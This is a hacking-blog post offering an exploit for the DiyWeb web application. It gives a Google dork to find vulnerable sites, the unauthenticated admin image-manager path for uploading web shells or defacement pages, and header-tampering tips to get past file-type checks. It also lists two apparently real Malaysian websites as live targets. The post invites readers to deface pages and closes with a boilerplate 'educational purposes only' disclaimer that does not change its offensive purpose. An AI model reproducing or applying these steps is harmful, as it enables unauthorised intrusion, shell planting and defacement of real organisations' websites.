DiyWeb Admin Bypass and Remote file/shell Upload exploit

Hi Guys, hope you are well. so we are back on our Old topic after a long time ! enjoy new exploit and please share your views and share our Links on Facebook,twitter etc. Thanks !
so Now turn to work. our new exploit is DiyWeb admin bypass, in this vulnerability we can upload our shell, deface pages, and files by bypassing admin login panel.
Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp


admin+bypass+safe+monde+bypass+windows+server+asp+shell.jpg (400×300)
Dork : "Power by DiyWeb" 
            inurl:/template.asp?menuid=
Pocdiyweb/menu/admin/image_manager.asp
This exploit's almost all vulnerable websites are Malaysiyan.
To upload your files Goto : http://www.website.com/diyweb/menu/admin/image_manager.asp
and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites
Live Demo : 
http://otgmalaysia.com/diyweb/menu/admin/image_manager.asp
http://www.famosapadu.com.my/diyweb/menu/admin/image_manager.asp

find more using Google dork :) Thanks for reading. please share post on facebook and other social networks


JBOSS Exploitation:
http://resources.infosecinstitute.com/jboss-exploitation/
EC-Council Certification:
http://www.infosecinstitute.com/certifications/ec-council.html#ceh
Share:

0 comments:

Post a Comment

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.